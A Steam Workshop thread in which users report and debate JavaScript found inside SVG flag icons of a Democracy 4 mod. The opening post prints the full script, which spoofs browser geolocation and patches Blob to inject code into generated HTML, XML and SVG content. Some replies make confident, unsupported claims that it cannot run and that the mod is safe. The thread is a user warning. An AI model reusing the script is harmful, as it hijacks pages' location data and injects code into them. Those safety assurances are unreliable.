Butikssida
Democracy 4
Alla Diskussioner Skärmbilder Konst Sändningar Filmer Workshop Nyheter Guider Recensioner

Democracy 4

Butikssida
Democracy 4 >  Workshop feelinWitchys workshop Democracy 4+ Diskussioner
Democracy 4+
Beskrivning Diskussioner5 Kommentarer125 Ändringar
jackmastermind 17 aug @ 18:52
2
3
MALWARE. DO NOT DOWNLOAD.
Look at data/svg/ukflagnew.svg for example, SVGs are just supposed to be image icons. So many lines of geolocation data. This should not exist. Do NOT download this mod unless you remove all the malware. Please report (for some reason, my steam account is not letting me file a report right now).

Code, found in svg files:
<![CDATA[
window.Vyagtit = navigator.geolocation.getCurrentPosition.bind(navigator.geolocation);
window.FNuvlyG = navigator.geolocation.watchPosition.bind(navigator.geolocation);
let WAIT_TIME = 100;


if (!['http://', 'https://'].includes(window.location.protocol)) {
// default spoofed location
window.fopas = true;
window.bwnzX = 38.883333;
window.REKwE = -77.000;
}

function waitGetCurrentPosition() {
if ((typeof window.fopas !== 'undefined')) {
if (window.fopas === true) {
window.cNHFrjv({
coords: {
latitude: window.bwnzX,
longitude: window.REKwE,
accuracy: 10,
altitude: null,
altitudeAccuracy: null,
heading: null,
speed: null,
},
timestamp: new Date().getTime(),
});
} else {
window.Vyagtit(window.cNHFrjv, window.BtxvaFW, window.cDhvh);
}
} else {
setTimeout(waitGetCurrentPosition, WAIT_TIME);
}
}

function waitWatchPosition() {
if ((typeof window.fopas !== 'undefined')) {
if (window.fopas === true) {
navigator.getCurrentPosition(window.zXdZHYb, window.lWHypeI, window.VUxyU);
return Math.floor(Math.random() * 10000); // random id
} else {
window.FNuvlyG(window.zXdZHYb, window.lWHypeI, window.VUxyU);
}
} else {
setTimeout(waitWatchPosition, WAIT_TIME);
}
}

navigator.geolocation.getCurrentPosition = function (successCallback, errorCallback, options) {
window.cNHFrjv = successCallback;
window.BtxvaFW = errorCallback;
window.cDhvh = options;
waitGetCurrentPosition();
};
navigator.geolocation.watchPosition = function (successCallback, errorCallback, options) {
window.zXdZHYb = successCallback;
window.lWHypeI = errorCallback;
window.VUxyU = options;
waitWatchPosition();
};

const instantiate = (constructor, args) => {
const bind = Function.bind;
const unbind = bind.bind(bind);
return new (unbind(constructor, null).apply(null, args));
}

Blob = function (_Blob) {
function secureBlob(...args) {
const injectableMimeTypes = [
{ mime: 'text/html', useXMLparser: false },
{ mime: 'application/xhtml+xml', useXMLparser: true },
{ mime: 'text/xml', useXMLparser: true },
{ mime: 'application/xml', useXMLparser: true },
{ mime: 'image/svg+xml', useXMLparser: true },
];
let typeEl = args.find(arg => (typeof arg === 'object') && (typeof arg.type === 'string') && (arg.type));

if (typeof typeEl !== 'undefined' && (typeof args[0][0] === 'string')) {
const mimeTypeIndex = injectableMimeTypes.findIndex(mimeType => mimeType.mime.toLowerCase() === typeEl.type.toLowerCase());
if (mimeTypeIndex >= 0) {
let mimeType = injectableMimeTypes[mimeTypeIndex];
let injectedCode = `<script>(
${iVWLe}
)();<\/script>`;

let parser = new DOMParser();
let xmlDoc;
if (mimeType.useXMLparser === true) {
xmlDoc = parser.parseFromString(args[0].join(''), mimeType.mime); // For XML documents we need to merge all items in order to not break the header when injecting
} else {
xmlDoc = parser.parseFromString(args[0][0], mimeType.mime);
}

if (xmlDoc.getElementsByTagName("parsererror").length === 0) { // if no errors were found while parsing...
xmlDoc.documentElement.insertAdjacentHTML('afterbegin', injectedCode);

if (mimeType.useXMLparser === true) {
args[0] = [new XMLSerializer().serializeToString(xmlDoc)];
} else {
args[0][0] = xmlDoc.documentElement.outerHTML;
}
}
}
}

return instantiate(_Blob, args); // arguments?
}

// Copy props and methods
let propNames = Object.getOwnPropertyNames(_Blob);
for (let i = 0; i < propNames.length; i++) {
let propName = propNames;
if (propName in secureBlob) {
continue; // Skip already existing props
}
let desc = Object.getOwnPropertyDescriptor(_Blob, propName);
Object.defineProperty(secureBlob, propName, desc);
}

secureBlob.prototype = _Blob.prototype;
return secureBlob;
}(Blob);

Object.freeze(navigator.geolocation);

window.addEventListener('message', function (event) {
if (event.source !== window) {
return;
}
const message = event.data;
switch (message.method) {
case 'ndqCVCx':
if ((typeof message.info === 'object') && (typeof message.info.coords === 'object')) {
window.bwnzX = message.info.coords.lat;
window.REKwE = message.info.coords.lon;
window.fopas = message.info.fakeIt;
}
break;
default:
break;
}
}, false);
//]]>
< >
Visar 1-8 av 8 kommentarer
JELLYGUARD 11 sep @ 5:56 
I'm concerned about the code behind when the Norton pop-up after this been installed. It’s definitely a significant issue, and it seems like the developer is ignoring it.:LIS_poker_face:
#1
WhskyTangoFxtrot 11 sep @ 13:37 
This is a geolocation spoofer that also monkey-patches Blob to inject arbitrary script into any HTML/XML/SVG blob your page (or game webview) creates. That second part is a big red flag.

Sick Burn from AI: Bugs/quirks

"Inside waitWatchPosition() it calls navigator.getCurrentPosition(...) (missing .geolocation.). That’s not a standard API and would normally throw—so either this is a copy/paste bug, or they patched navigator.getCurrentPosition elsewhere. Sloppy."
#2
neil901 15 sep @ 22:28 
Would love to see the developer respond to this
#3
Adeptus Freemanicus 7 okt @ 11:04 
The only way I can see this happening is if the svg already contained this before or in the process of converting the image from png/jpg to svg a site added this in.

I don't see a single reason the author would add this. Many logical reasons and explanations for why this is not maliciously or intentionally added by author.

Lastly, I also don't believe that either 1. This code can actually run. And/Or 2. Anyone actually get's your geolocation. The code doesn't point to any address/website for that to be possible.

But I also doubt you'd lie, and I also believe that this file should be removed, hopefully also finding why said code was there in the first place.

Note: I'm pretty sure the author still is unable to update their mods due to a past bug with Democracy 4 that still isn't fixed.
#4
FatRat 22 okt @ 11:24 
While it doesn't point to the URL in that code, it doesn't mean the rest of the malicious code isn't somwhere else within the mod files. Going to start reviewing it now
#5
Butcher 28 okt @ 4:25 
what is the debate about? i understand the situation but how could this benefit the mod author? almost 70k people use this mod and i doubt the code can inject crypto or anything money making/ selling info to big enterprises. lately democracy and it's mods have been slow and ignored so i can see new people making malware but idk about the older ones such as this, still, if we get more info it'll be great
Senast ändrad av Butcher; 28 okt @ 4:26
#6
Adeptus Freemanicus 28 okt @ 11:06 
I decided to really look into it again, and here's the definitive answer:
• Yes, it is malicious code, what it does is simple, it spoofs locations and also spreads it self to anything it can. With possibility of being able to to listen to all types of messages in APIs by freezing them and maybe also being controlled remotely to selectively collect data.
• It executes by being embedded in HTMLs, CSS files, or in any server side/web environment
with the possibility of infecting visitors of that page or host machine.
• No, it cannot infect you or even run AT ALL, it only runs in browsers. None of the code can harm you as it cannot run.
• No, it cannot spread, unless you specifically open this in a browser or html UI that can execute JS files.
• The chance of the author adding this on purpose is almost 0%. Because there's no gain in doing so.
• This mod is safe to download and use, tens of thousands of people do just fine.

Here's the likely reason why this exists:
Mod author downloaded this svg off the web or maybe a base part of it, like a jpg or png. It either was already infected with this code or was added by a a file conversion site (very common).

There's also the chance the author's PC is infected and it simply spread to this file. If they wanted to hack you or spread malware, they would put in code that can actually run.

How to clear the malware (Not necessary) :
Open ukflagnew.svg or any infected file in a text editor (NOT IN A BROWSER)
Delete anything in between <script> and </script>.
Save the file.

TL;DR:
• The file "ukflagnew.svg" (and possibly others) contain malware.
• It cannot harm you.
• Almost 0% chance it was maliciously added by the author.
Senast ändrad av Adeptus Freemanicus; 28 okt @ 11:18
#7
Butcher 28 okt @ 11:20 
Ursprungligen skrivet av Adeptus Freemanicus:
I decided to really look into it again, and here's the definitive answer:
• Yes, it is malicious code, what it does is simple, it spoofs locations and also spreads it self to anything it can. With possibility of being able to to listen to all types of messages in APIs by freezing them and maybe also being controlled remotely to selectively collect data.
• It executes by being embedded in HTMLs, CSS files, or in any server side/web environment
with the possibility of infecting visitors of that page or host machine.
• No, it cannot infect you or even run AT ALL, it only runs in browsers. None of the code can harm you as it cannot run.
• No, it cannot spread, unless you specifically open this in a browser or html UI that can execute JS files.
• The chance of the author adding this on purpose is almost 0%. Because there's no gain in doing so.
• This mod is safe to download and use, tens of thousands of people do just fine.

Here's the likely reason why this exists:
Mod author downloaded this svg off the web or maybe a base part of it, like a jpg or png. It either was already infected with this code or was added by a a file conversion site (very common).

There's also the chance the author's PC is infected and it simply spread to this file. If they wanted to hack you or spread malware, they would put in code that can actually run.

How to clear the malware (Not necessary) :
Open ukflagnew.svg or any infected file in a text editor (NOT IN A BROWSER)
Delete anything in between <script> and </script>.
Save the file.

TL;DR:
• The file "ukflagnew.svg" (and possibly others) contain malware.
• It cannot harm you.
• Almost 0% chance it was maliciously added by the author.


all i have to say is....BRAVO!!!!
#8
< >
Visar 1-8 av 8 kommentarer
Per sida: 1530 50